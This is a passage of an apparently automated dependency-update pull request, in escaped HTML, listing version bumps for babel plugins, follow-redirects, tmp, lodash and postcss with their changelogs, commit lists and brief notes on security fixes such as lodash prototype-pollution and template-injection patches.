8] Bump nodejs requirements to \u003ccode\u003e^20.19.0 || \u0026gt;= 22.12.0\u003c/code\u003e (\u003ca href=\"https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs/issues/17204\"\u003e#17204\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/babel/babel/commits/v7.29.7/packages/babel-plugin-transform-modules-systemjs\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for \u003ccode\u003e@​babel/plugin-transform-modules-systemjs\u003c/code\u003e since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.3 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/21ef28a544c5e57f4c34b8476d75f2144609a1eb\"\u003e\u003ccode\u003e21ef28a\u003c/code\u003e\u003c/a\u003e Release version 1.15.11 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7c88135da3bd0681a7e156ee66b16b2f6f98b480\"\u003e\u003ccode\u003e7c88135\u003c/code\u003e\u003c/a\u003e Roll back tree shaking.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/6e389ba094beec211a8847788a146917a16c1bdb\"\u003e\u003ccode\u003e6e389ba\u003c/code\u003e\u003c/a\u003e Release version 1.15.10 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5bc496e0229abda823221e0c6267926a3f93f262\"\u003e\u003ccode\u003e5bc496e\u003c/code\u003e\u003c/a\u003e Shake me up before you go-go.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/694d6b47a42bc8377e5ef1480394de451e16bd5b\"\u003e\u003ccode\u003e694d6b4\u003c/code\u003e\u003c/a\u003e Bump minimist from 1.2.5 to 1.2.8\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.3...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tmp` from 0.2.1 to 0.2.7\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/raszi/node-tmp/blob/master/CHANGELOG.md\"\u003etmp's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.2.2 (2024-02-28)\u003c/h2\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/278\"\u003e#278\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/268\"\u003e#268\u003c/a\u003e: Revert \u0026quot;fix \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/246\"\u003e#246\u003c/a\u003e: remove any double quotes or single quotes… (\u003ca href=\"https://github.com/mbargiel\"\u003e\u003ccode\u003e@​mbargiel\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:memo: Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/raszi/node-tmp/pull/279\"\u003e#279\u003c/a\u003e Closes \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/266\"\u003e#266\u003c/a\u003e: move paragraph on graceful cleanup to the head of the documentation (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 5\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eCarsten Klein (\u003ca href=\"https://github.com/silkentrance\"\u003e\u003ccode\u003e@​silkentrance\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDave Nicolson (\u003ca href=\"https://github.com/dnicolson\"\u003e\u003ccode\u003e@​dnicolson\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eKARASZI István (\u003ca href=\"https://github.com/raszi\"\u003e\u003ccode\u003e@​raszi\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMaxime Bargiel (\u003ca href=\"https://github.com/mbargiel\"\u003e\u003ccode\u003e@​mbargiel\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/robertoaceves\"\u003e\u003ccode\u003e@​robertoaceves\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/8ea1f37d75c67569e0f151448330d52f7babf211\"\u003e\u003ccode\u003e8ea1f37\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/8f24f788a356b5d45c9bec894632bd4931338153\"\u003e\u003ccode\u003e8f24f78\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/ce787f37aaacccad921ae90990c9da33481fe59c\"\u003e\u003ccode\u003ece787f3\u003c/code\u003e\u003c/a\u003e Reject non-string prefix, postfix, template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/41f71598d03f104a67e0448a7cb9bd4efcdd5980\"\u003e\u003ccode\u003e41f7159\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/efa4a06f24374797ae32ab2b6ae39b7a611ae429\"\u003e\u003ccode\u003eefa4a06\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/7ef2728ce0211b8110b2033dfe62eaf030341acf\"\u003e\u003ccode\u003e7ef2728\u003c/code\u003e\u003c/a\u003e Check for relative values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/3d2fe387f3f91b13830b9182faa02c3231ea8258\"\u003e\u003ccode\u003e3d2fe38\u003c/code\u003e\u003c/a\u003e Bump up the version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/e16282879e5d0554fe824e1ab3df724847e91183\"\u003e\u003ccode\u003ee162828\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/raszi/node-tmp/issues/309\"\u003e#309\u003c/a\u003e from fflorent/fix-tmp-dir-with-dir\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/b847d2f1a42b625c26149f4a2029ed00a1edf90b\"\u003e\u003ccode\u003eb847d2f\u003c/code\u003e\u003c/a\u003e Fix use of tmp.dir() with \u003ccode\u003edir\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/raszi/node-tmp/commit/08fa3abac32b621506512724b28b56b9c4a95846\"\u003e\u003ccode\u003e08fa3ab\u003c/code\u003e\u003c/a\u003e Update version\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/raszi/node-tmp/compare/v0.2.1...v0.2.7\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `lodash` from 4.17.21 to 4.18.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lodash/lodash/releases\"\u003elodash's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e4.18.1\u003c/h2\u003e\n\u003ch2\u003eBugs\u003c/h2\u003e\n\u003cp\u003eFixes a \u003ccode\u003eReferenceError\u003c/code\u003e issue in \u003ccode\u003elodash\u003c/code\u003e \u003ccode\u003elodash-es\u003c/code\u003e \u003ccode\u003elodash-amd\u003c/code\u003e and \u003ccode\u003elodash.template\u003c/code\u003e when using the \u003ccode\u003etemplate\u003c/code\u003e and \u003ccode\u003efromPairs\u003c/code\u003e functions from the modular builds. See \u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6167#issuecomment-4165269769\"\u003elodash/lodash#6167\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eThese defects were related to how lodash distributions are built from the main branch using \u003ca href=\"https://github.com/lodash-archive/lodash-cli\"\u003ehttps://github.com/lodash-archive/lodash-cli\u003c/a\u003e. When internal dependencies change inside lodash functions, equivalent updates need to be made to a mapping in the lodash-cli. (hey, it was ahead of its time once upon a time!). We know this, but we missed it in the last release. It's the kind of thing that passes in CI, but fails bc the build is not the same thing you tested.\u003c/p\u003e\n\u003cp\u003eThere is no diff on main for this, but you can see the diffs for each of the npm packages on their respective branches:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003elodash\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm...4.18.1-npm\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-es\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-es...4.18.1-es\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash-amd\u003c/code\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-amd...4.18.1-amd\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003elodash.template\u003c/code\u003e\u003ca href=\"https://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\"\u003ehttps://github.com/lodash/lodash/compare/4.18.0-npm-packages...4.18.1-npm-packages\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e4.18.0\u003c/h2\u003e\n\u003ch2\u003ev4.18.0\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.0\"\u003ehttps://github.com/lodash/lodash/compare/4.17.23...4.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.unset\u003c/code\u003e / \u003ccode\u003e_.omit\u003c/code\u003e\u003c/strong\u003e: Fixed prototype pollution via \u003ccode\u003econstructor\u003c/code\u003e/\u003ccode\u003eprototype\u003c/code\u003e path traversal (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-f23m-r3pf-42rh\"\u003eGHSA-f23m-r3pf-42rh\u003c/a\u003e, \u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003efe8d32e\u003c/a\u003e). Previously, array-wrapped path segments and primitive roots could bypass the existing guards, allowing deletion of properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.21...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `postcss` from 8.4.27 to 8.5.12\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/releases\"\u003epostcss's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed declaration parsing performance (by \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax regression (by \u003ca href=\"https://github.com/43081j\"\u003e\u003ccode\u003e@​43081j\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epostcss-scss\u003c/code\u003e commend regression.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed reading any file via user-generated CSS.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eopts.unsafeMap\u003c/code\u003e to disable checks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed nested brackets parsing performance (by \u003ca href=\"https://github.com/offset\"\u003e\u003ccode\u003e@​offset\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded more details to \u003ccode\u003eUnknown word\u003c/code\u003e error (by \u003ca href=\"https://github.com/hiepxanh\"\u003e\u003ccode\u003e@​hiepxanh\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed types (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003cli\u003eFixed docs (by \u003ca href=\"https://github.com/catnipan\"\u003e\u003ccode\u003e@​catnipan\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed end position of rules with semicolon (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed backwards compatibility for complex cases (by \u003ca href=\"https://github.com/romainmenke\"\u003e\u003ccode\u003e@​romainmenke\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5 “Duke Alloces”\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/postcss/postcss/blob/main/CHANGELOG.md\"\u003epostcss's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.15\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed declaration parsing performance (by \u003ca href=\"https://github.com/homanp\"\u003e\u003ccode\u003e@​homanp\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.14\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed custom syntax regression (by \u003ca href=\"https://github.com/43081j\"\u003e\u003ccode\u003e@​43081j\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.13\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epostcss-scss\u003c/code\u003e commend regression.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed reading any file via user-generated CSS.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003eopts.unsafeMap\u003c/code\u003e to disable checks.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.11\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed nested brackets parsing performance (by \u003ca href=\"https://github.com/offset\"\u003e\u003ccode\u003e@​offset\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca 